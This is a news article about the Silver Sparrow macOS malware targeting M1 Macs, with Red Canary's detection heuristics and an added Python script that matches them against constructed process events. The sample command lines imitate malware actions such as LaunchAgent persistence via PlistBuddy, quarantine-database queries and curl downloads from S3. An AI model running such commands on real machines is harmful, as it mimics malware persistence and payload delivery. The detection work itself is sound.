M1 Macs targeted by additional malware, exact threat remains a mystery

The second known piece of malware that was originally compiled to run on M1 Macs has been discovered by security firm Red Canary.



Given the name “Silver Sparrow”, the malicious package is said to use the macOS Installer JavaScript API to execute suspicious commands. After more than a week of observing the malware, neither Red Canary nor its research partners saw a final payload, so the exact threat it poses remains a mystery.

Nevertheless, Red Canary said the malware could be a fairly serious threat:

Although we have not yet observed Silver Sparrow delivering additional malicious payloads, the forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest that Silver Sparrow is a fairly serious threat, uniquely positioned to deliver a potentially impactful payload at a moment’s notice.

According to data provided by Malwarebytes, ‘Silver Sparrow’ infected 17,139 macOS systems in 153 countries as of February 17, including ‘major detection in the United States, the United Kingdom, Canada, France and Germany’. Red Canary did not specify how many of these systems were M1 Macs, if any.

Since the “Silver Sparrow” binaries “do not look like much yet”, Red Canary referred to them as ‘bystander binaries’. When run on an Intel-based Mac, the malicious package simply displays an empty window with a “Hello, World!” message, while the Apple silicon binary opens a red window that says “You did it!”



Red Canary has shared detection methods that cover a wide range of macOS threats; the steps are not specific to “Silver Sparrow”:

– Look for a process that appears to be PlistBuddy, running with a command line that contains all of the following: LaunchAgents, RunAtLoad and true. This analytic helps find several macOS malware families that establish LaunchAgent persistence.
– Look for a process that appears to be executing sqlite3, with a command line containing LSQuarantine. This analytic helps find several macOS malware families that manipulate or search the metadata of downloaded files.
– Look for a process that appears to be curl, with a command line that contains s3.amazonaws.com. This analytic helps find several macOS malware families that use S3 buckets for distribution.
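The three heuristics above are written for a process-telemetry search (process name plus command line). The script below is an added example, not code from Red Canary or from the original article, that turns them into rules and runs them over a handful of constructed process events of the kind an endpoint agent would report; the event records, the process paths and the S3 bucket name are all made up for illustration.

```python
"""Apply the three macOS process heuristics quoted above to sample process events."""

# Constructed sample events (not real telemetry). Each record is what an EDR
# agent typically emits: the executable path/name and the full command line.
SAMPLE_EVENTS = [
    {"process": "/usr/libexec/PlistBuddy",
     "cmdline": "/usr/libexec/PlistBuddy -c 'Add :RunAtLoad bool true' "
                "/Users/alice/Library/LaunchAgents/com.example.agent.plist"},
    {"process": "/usr/bin/sqlite3",
     "cmdline": "sqlite3 /Users/alice/Library/Preferences/"
                "com.apple.LaunchServices.QuarantineEventsV2 "
                "'select LSQuarantineDataURLString from LSQuarantineEvent'"},
    {"process": "/usr/bin/curl",
     "cmdline": "curl -s https://example-bucket.s3.amazonaws.com/update.bin -o /tmp/update"},
    # Benign events that share a process name but not the suspicious arguments.
    {"process": "/usr/bin/curl",
     "cmdline": "curl https://www.apple.com"},
    {"process": "/usr/libexec/PlistBuddy",
     "cmdline": "/usr/libexec/PlistBuddy -c 'Print :CFBundleVersion' "
                "/Applications/Example.app/Contents/Info.plist"},
]

# One rule per heuristic: (rule name, expected process basename, substrings that
# must ALL be present in the command line). Process names are compared
# case-insensitively because reporting differs between agents; the command-line
# tokens are matched exactly as the heuristics spell them.
RULES = [
    ("launchagent_persistence", "plistbuddy", ["LaunchAgents", "RunAtLoad", "true"]),
    ("quarantine_metadata_access", "sqlite3", ["LSQuarantine"]),
    ("s3_bucket_download", "curl", ["s3.amazonaws.com"]),
]


def process_basename(path: str) -> str:
    """Reduce '/usr/libexec/PlistBuddy' to 'plistbuddy' so rules work on paths or bare names."""
    return path.rsplit("/", 1)[-1].lower()


def match_rules(event: dict) -> list:
    """Return the names of every rule that fires on a single process event."""
    name = process_basename(event["process"])
    cmdline = event["cmdline"]
    return [
        rule_name
        for rule_name, expected_process, needles in RULES
        if name == expected_process and all(n in cmdline for n in needles)
    ]


def scan(events: list) -> list:
    """Run every event through the rules and collect (rule, command line) hits."""
    hits = []
    for event in events:
        for rule_name in match_rules(event):
            hits.append({"rule": rule_name, "cmdline": event["cmdline"]})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] {hit['cmdline']}")
```

Each rule requires every listed token, so the benign PlistBuddy and curl events are not flagged; in a real deployment the same predicates would be expressed in the query language of whatever process-telemetry source is in use, and the LaunchAgent rule in particular will also fire on legitimate installers, so hits should be triaged rather than treated as confirmed Silver Sparrow.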

The first piece of malware that could run natively on M1 Macs was discovered a few days ago. Technical details about this second piece of malware can be found in the Red Canary blog post, and Ars Technica also has a good write-up.
